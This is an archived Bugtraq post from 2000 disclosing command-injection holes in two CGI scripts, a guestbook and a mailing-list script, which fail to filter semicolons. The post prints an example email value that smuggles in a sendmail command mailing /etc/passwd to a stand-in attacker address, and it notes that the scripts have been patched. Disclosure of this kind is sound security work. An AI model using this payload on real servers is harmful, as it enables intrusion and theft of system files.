Bugtraq mailing list archives
BS Scripts Vulnerabilities
From: rivendell_team () YAHOO COM
Date: Thu, 21 Dec 2000 07:19:31 -0000
++++++++++++++++++++++++++++++++++++ BS Scripts Multiple CGI Vulnerabilities Discovered by Elf (whitehatjoe () hotmail com) Greetz: 0x7f, CompSci, Dugnet ++++++++++++++++++++++++++++++++++++ Info There are a couple of scripts from bsScripts (www.stanback.net) , that have holes in them because the author did not filter out ; from the form input. The scripts that this affects is bsguest (a guestbook script) and bslist (a mailing list script). The hole allows anyone to execute commands on the server. The author has been informed and the holes are now patched in the latest release. -bsguest.cgi- BSGuest does not filter out ; resulting in the ability for anyone to execute commands on the server. The attacker just enters his email address as 'hacker () example com;/usr/sbin/sendmail hacker () example com < /etc/passwd', and then the server mails a confirmation letter along with the passwd file to the attacker. -bslist.cgi- BSList also doesn't filter out the ; and once again anybody can execute commands on the server. This can be exploited by signing up for the mailing list with the email address of 'hacker () example com;/usr/sbin/sendmail hacker () example com < /etc/passwd' +++++++++++++++++++++++++++++ "It's funny how impossible dreams manifest" - Cypress Hill EOF +++++++++++++++++++++++++++++
Current thread:
- BS Scripts Vulnerabilities rivendell_team (Dec 21)
- Re: BS Scripts Vulnerabilities Raptor (Dec 22)